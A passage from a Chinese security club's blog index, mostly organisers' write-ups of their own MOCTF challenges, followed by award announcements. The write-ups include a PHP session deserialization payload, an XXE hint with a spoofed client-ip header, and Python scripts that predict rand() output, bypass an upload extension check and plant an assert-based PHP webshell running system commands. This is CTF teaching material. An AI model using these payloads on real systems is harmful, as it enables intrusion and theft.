-.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n

\u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"
\u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n

\u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php

<?php\n    ini_set('session.serialize_handler', 'php_binary');\n    session_start();\n\n    if(isset($_POST['username']) && isset($_POST['password'])){\n        $username = $_POST['username'];\n        $password = $_POST['password'];\n        $_SESSION[\"username\"] = $username;\n        header(\"Location:./index.php\");\n    }\n    else if(isset($_SESSION[\"username\"])){\n        echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n    }\n    else ...\n

flag.php

<?php\nsession_start();\nclass MOCTF{\n    public $flag;\n    public $name;\n    function __destruct(){\n        $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n        if($this->flag == $this->name){\n            echo \"Wow,this is flag:\".$this->flag;\n        }\n    }\n}\n

\u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019

ini_set('session.serialize_handler', 'php_binary');\n

\u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload

$a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
|O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n

\u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"
\u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n

\u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type\u5b57\u6bb5\u662fapplication/json\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020

client-ip:localhost\n

\u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"
\u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n

index.php

<?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n    $result = '';\n    while($l--) {\n        $result .= chr(rand(ord('a'), ord('z')));\n    }\n    return $result;\n}\n\nfunction test_rand_code() {\n    $ip=$_SERVER['REMOTE_ADDR'];\n    $code=get_rand_code();\n    $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n    @socket_connect($socket, $ip, 8888);\n    @socket_write($socket, $code.PHP_EOL);\n    @socket_close($socket);\n    die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n    $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n    if(!is_array($filename)) {\n        $filename = explode('.', $filename);\n    }\n    if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n        die('error ext!');\n    }\n    $code=get_rand_code();\n    $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n    file_put_contents(\"$savepath\".$finalname, $content);\n    usleep(3000000);\n    unlink(\"$savepath\".$finalname);\n    die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n    $oldmask = umask(0);\n    mkdir($savepath, 0777);\n    umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n    $act=$_GET['action'];\n    if($act==='upload')\n    {\n        $filename=$_POST['filename'];\n        if(!is_array($filename)) {\n            $filename = explode('.', $filename);\n        }\n        $content=$_POST['content'];\n        waf($content);\n        upload($filename,$content,$savepath);\n    }\n    else if($act==='test')\n    {\n        test_rand_code();\n    }\n}\nelse {\n    highlight_file('index.php');\n}\n?>\n

\u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test\u4f1a\u8c03\u7528test_rand_code\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/

\u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py

#\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import *  \nfrom time import ctime  \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n    HOST = ''  \n    PORT = 8888\n    BUFSIZ = 128  \n    ADDR = (HOST, PORT)  \n    tcpSerSock = socket(AF_INET, SOCK_STREAM)\n    tcpSerSock.bind(ADDR)\n    tcpSerSock.listen(5)\n    rand_num=0\n    l=[]\n    while True:\n        tcpCliSock, addr = tcpSerSock.accept()  \n        while True:  \n            data = tcpCliSock.recv(BUFSIZ)  \n            if not data:  \n                break  \n            data=data[0:6]\n        print data,l\n            for i in data:\n                l.append(ord(i)+1-ord('a'))\n        rand_num+=1\n        if rand_num==6:\n            break\n    tcpCliSock.close()  \n    tcpSerSock.close()\n    return l\n\ndef get_salt(l):\n    salt=\"\"\n    for i in range(6):\n        j=len(l)\n        r=(l[j-3]+l[j-31])-1\n        if r>26:\n            r-=26\n        #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n        l.append(r)\n        salt+=chr(r+ord('a')-1)\n        #print salt\n    return salt\n\ndef get_flag(salt):\n    s=hashlib.sha1('119.23.73.3').hexdigest()\n    url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n    data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n    r2=r.post(url1,data=data)\n    print salt\n    if '404' not in r2.text:\n        print r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n    s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])-int(s[j]))\n    get_flag(salt2)\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])+int(s[j]))\n    get_flag(salt2)\n

put.py

#\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n    url2=url+\"test\"\n    r1=r.get(url2)\n    print url2\n    print r1.text\ndef upload():\n    data={\"filename[4]\":\"jpg\",\n          \"filename[2]\":\"jpg\",\n          \"filename[1]\":\"php\",\n          \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n          \"a\":\"system('cat ../../flag.php');\"\n          }\n    url1=url+\"upload\"\n    r2=r.post(url1,data=data)\n    print r2.text\n\nfor i in range(6):\n    get_test()\nupload()\n

\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"

\u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427

  1. \u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0
  2. \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b
  3. \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898
  4. \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b
  5. \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e

\u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002

\u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"

2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002

"},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"

\u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 X-NUCA\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002

\u6211\u4eec\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d\u7684\u6210\u7ee9\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"

\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002

